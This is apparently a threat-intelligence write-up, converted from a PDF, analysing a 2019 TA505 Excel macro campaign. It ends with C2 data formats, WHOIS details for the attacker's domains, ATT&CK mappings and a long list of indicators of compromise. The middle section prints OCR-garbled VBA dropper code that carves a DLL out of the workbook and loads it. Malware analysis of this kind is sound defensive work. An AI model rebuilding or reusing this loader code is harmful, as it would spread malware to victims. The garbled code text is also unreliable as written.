1/12 StrangerealIntel Cyber Threat Intel github.com/StrangerealIntel/CyberThreatIntel/blob/master/cybercriminal groups/TA505/04-10-2019/Malware Analysis 04-10-2019.md Analysis of the new TA505 campaign Table of Contents Malware analysis Cyber Threat Intel Indicators Of Compromise (IOC) References MITRE ATT&CK Matrix Links Original Tweet Link Anyrun Malware analysis The initial vector is a malicious excel file which used an XLM macro (macro v4). This uses a function for launch the payload when the excel windows is active (selected as primary window). As first action, this executes the module 1. The function call in Module 1 create a Wscript object for change the current directory, show the fake message and push debug messages. https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/cybercriminal%20groups/TA505/04-10-2019/Malware%20Analysis%2004-10-2019.md https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/Autoopen.PNG 2/12 The userform execute the extract and execute a different PE instead of the architecture of the victim (x86 and x64). https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/Module1-1.PNG https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/Module2-1.PNG 3/12 https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/userform.PNG https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/Module3.PNG https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/Module1-2.PNG Labell Click() UserForm_Activate() DoEvents ReplaceCurrentModule UserForm_Initialize() SystemButtonSettings (Me, ReplaceCurrentModule({) TempName = UserForm2.TextBoxl.Tag & “\templates. ZipName = TempName + ".zip" ZipFolder = UserForm2.TextBoxl.Tag path_module As String APT_LENGTH As Long mod_Exec As Integer path_module = UserForm2.TextBox2.Tag + “\module_p1.d11 API_LENGTH = 266248 mod_Exec = 1 #If Winé4 Then path_module = UserForm?.TextBox2.Tag + "' APT_LENGTH = 186368 mod_Exec = 2 #End If in", ZipName, path_module DoEvents ThisWorkbook.Sheets.Copy Application.DisplayAlerts = ActiveWorkbook.SaveAs TempName, FileFormat:=51 DoEvents ActiveWorkbook. Close DoEvents FileCopy TempName, ZipName oApp = CreateObject("Shell.Application"} oApp.Namespace(ZipFolder) .CopyHere oApp.Namespace(ZipName) .items .Item("x1l\embeddings\, NewValuje ZipFolder + "\oleObjectl.bin", path_module, API_LENGTH, mod_Exec ChDir (UserForm?.TextBox?.Tagz) No_RbdSAslla = RbdSAslla2(path_module) RbdSAslla #17 Win64 Then Declare PtrSafe RbdSAslla Lib "modu 92.011" () As Integer ar Declare PtrSafe RbdSAslla? Lib "ke " Alias "LoadLibr Declare RbdSAslla2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Declare RbodSAslla Lib "“module_pl.d11" () As Integer NewValuje(s As String, path_moduleAs String, fl As Long, mod_Exec As Integer) FileAccess As Long, d_? As Byte, d_3 As Byte, d_4 As Byte array_data() As Long array_data({1 To #1) array_data(1) = CByte(77) array_data(2) = CByte(98) array_data(3}) = CByte(144) FileAccess = FreeFile Open s For Binary Access Read As FileAccess cur As Integer al hile Not EOF(FileAccess) FileAccess, , d2 If d_? = array_data(1) Then FileAccess, , d_3 If d_3 = array_data(2) Then FileAccess, , d4 If d_4 = array_data(3) Then If cur = mod_Exec Then For k = 4 To f1 FileAccess, , d_2 array_data(k) = d_2 N k cur = cur +1 End If End If End If End If Loop Close FileAccess FileAccess = FreeFile Open path_moduleFor Binary Lock Read Write As #FileAccess For i = LBound(array_data) To UBound({array_data) Put #FileAccess, , CByte(array_data(i)) Next i Close #FileAccess eObject1.bin") ry" (ByVal lpLibFileName As String) As Long Long 4/12 As anti-forensic technique, this delete the files by call of kill functions. We can note that a function is unused and seem to be a rest of the development of the macro. The implant executed push all in memory with a call of VirtualAlloc function. https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/Module1-2.PNG https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/Module2-2.PNG https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/Test.PNG 5/12 Once this, this checks the system informations, the process executed on the computer and try to detect if this run in a sandbox (low size of the disk). https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/implant/pushmemory.PNG https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/implant/virt.PNG 6/12 This sends the informations to the C2 and wait for the next instruction of the group. https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/implant/getinfos.PNG https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/implant/detectsize.PNG 7/12 We can list the informations send in the following variables : Variables Description &D= Name of the computer &U= Name of the user &OS= Version of the OS &PR= List of process (separed by %7C) And is presented this way (extracted from the sandbox): &D=User-PC&U=admin&OS=6.1&PR=Dwm.exe%7CEXCEL.EXE%7CExplorer.EXE%7Ctaskhost.exe%7Cwindanr.exe%7C That interesting to note that the group get only the process for see if the victim have security messures (AV, endpoint...) before launch the next step.This drop the clop ransomware if we observe the latest analysis on this subject.The group change currently the trust certificate for bypass the security messures that we can see on the analysis of VK_Intel : Recently, new domains used by the group have been spotted by Suspicious Link. On the HTML document, we can see that the fake page usurps dropbox in using external references and the path on the malicious excel document. We can see in more that the personal informations is like the Office of the Prime Minister of the Republic of Armenia. https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/implant/connect.PNG https://twitter.com/vk_intel https://twitter.com/killamjr https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/Intel/Links.PNG 8/12 8/12 9/12 https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/Intel/domain2.PNG https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/Intel/domain1.PNG windows-msd-update.com ©) Domain Information Domain: windows-msd-update.com Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com Registered On: 2019-10-01 Expires On: 2020-10-01 Updated On: 2019-10-01 Status: clientTransferProhibited Name Servers: a.dnspod.com b.dnspod.com c.dnspod.com © Registrant Contact | mia | Name: Artak Gasparyan Street: Shinararneri str.43 City: Yerevan State: YVN Postal Code: 374025 Country: AM Phone: +374.37494527465 Email: whois-agent@gmx.com dropbox-download.com ©) Domain Information Domain: dropbox-download.com Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com Registered On: 2019-10-01 Expires On: 2020-10-01 Updated On: 2019-10-01 Status: clientTransferProhibited Name Servers: a.dnspod.com b.dnspod.com c.dnspod.com & Registrant Contact Name: Artak Gasparyan Street: Shinararneri str. 43 City: Yerevan State: YVN Updated 2 hours ago © Updated 2 hours ago © 9/12 10/12 Cyber kill chain The process graphs resume all the cyber kill chains used by the attacker. References MITRE ATT&CK Matrix List of all the references with MITRE ATT&CK Matrix Enterprise tactics Technics used Ref URL Execution Execution through Module Load https://attack.mitre.org/techniques/T1129/ Discovery Query Registry https://attack.mitre.org/techniques/T1012/ Indicators Of Compromise (IOC) List of all the Indicators Of Compromise (IOC) Indicator Description https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/Intel/domain1.PNG https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/Intel/ID.PNG https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/Images/cyber.png https://attack.mitre.org/techniques/T1129/ https://attack.mitre.org/techniques/T1012/ 11/12 Indicator Description 147.135.204.64 IP C2 18.194.14.44 IP Requested 183.111.138.244 IP Requested 185.33.87.27 IP Requested 192.99.211.205 IP C2 3ee37a570cc968ca2ad5a99f920c9332 D8EA1BAE84345D1A432E872811E9ECBCF84DE0BA6 44a20233b3c3b1defcd7484d241c5be6 09A887F08C7F252E642805DDFF5F1FDC390F675E603 53b2c9d906fc9075fa375295c5bdcf5b 0776289CAC9F64211D5E5DDF14973157160DDCFBE2 89c3a79864a0f0fa5a6cd3f87e8bd3271d1265b4d632bb32bb6be02425b4fe78 89C3A79864A0F0FA5A6CD3F87E8BD3271D1265B4D6 C:\Users\admin\AppData\Roaming{97B34601-5B4A-40AF-8963- D8C75594998B} - 1.dll 0AF713AB3D6D17CD6B96D78FAC2677FE3B5B0051C C:\Users\admin\AppData\Roaming\module_p1.dll 57D29E8BA4D1C0ECAD75F2B9EEBEF757D872169C3 C:\Users\admin\AppData\Roaming\module_p2.dll C16D2A23A27C1E9EAE34D01613C4BAB0FE4871F1D c6d17efb69bd4a7ac8f9dc11f810c30b 77D8E6C621EA96AF5A677397FE367DC60689D7F4F4 Cheque.xls 375159A45823FF4EAFBA0C364209EB7C35B353E3C6 chogoon.com Domain Requested doc 6172.xls 564CF47E84589D5E130E0502B403DF4E9648B9AFEA ed0cde28ce66713974e339715bdde62b CBAAB49338F8F2A9F56575702D9943A3DAFD78EF78 f46e2c2925e6196fae3112fd0bcbb8c2 AD5910E44A63C0FC02376277D28D306A236CB87BCC hxxps://chogoon[.]com/srt/gedp4 HTTP/HTTPS requests hxxps://windows-wsus-en[.]com/version HTTP/HTTPS requests Invoice 7173.xls BAEE4D4F8838CD7107977D960E4478279E9F321D21 J_280586 D8EA1BAE84345D1A432E872811E9ECBCF84DE0BA6 LET 7833.xls 544154ED4B0495EBD44210AC6EAC4B5D7B9C9BE36 Letter 7711.xls E7379BB7A4B46E2378D5722FD2C8F4AE31A2AE15D5 office365-update-eu.com Domain C2 Receipt 0787.xls 564CF47E84589D5E130E0502B403DF4E9648B9AFEA Receipt 4685 YJLJ.xls 564CF47E84589D5E130E0502B403DF4E9648B9AFEA sample1.xls 6118EC7C0F06B45368DBD85B8F83958FC1F02F85E74 sample4.XLS 566745CE483F3DC1744C757DD7348CE0844BAF5DB8 windows-wsus-en.com Domain C2 Xerox Scan_84676113847687.XLS 8741346FB8D6C2F4CA80FA2B176F162AF620F86C5F Xerox.csv 566745CE483F3DC1744C757DD7348CE0844BAF5DB8 162.125.66.1 IP Requested 172.217.16.141 IP Requested 45.63.11.216 IP Requested 54.83.52.76 IP Requested 96.44.166.189 IP Requested a78e87d350c8cf3f6d7db126c5fadd7d837aef23df01194fc0973561cd20818e.xls A78E87D350C8CF3F6D7DB126C5FADD7D837AEF23D 12/12 Indicator Description C:\Users\admin\AppData\Roaming\libMongo1.dll 4414195087F01719270AE41F45953139CAF2F24A10C9 C:\Users\admin\Downloads\request.xls 34242C2D4A3EF625A6DA375B85B34A3FD3CAFB0444 dropbox-download.com Domain Requested hxxps://dropbox-download[.]com HTTP/HTTPS requests hxxps://dropbox-download[.]com/?05041770570340 HTTP/HTTPS requests hxxps://dropbox-download[.]com/?05610068412737 HTTP/HTTPS requests hxxps://dropbox-download[.]com/?35277620367160 HTTP/HTTPS requests hxxps://dropbox-download[.]com/download.php HTTP/HTTPS requests request.xls A78E87D350C8CF3F6D7DB126C5FADD7D837AEF23D windows-msd-update.com Domain C2 This can be exported as JSON format Export in JSON Links Original tweet: Links Anyrun: https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/cybercriminal%20groups/TA505/04-10-2019/IOC_TA505_07-10-19.json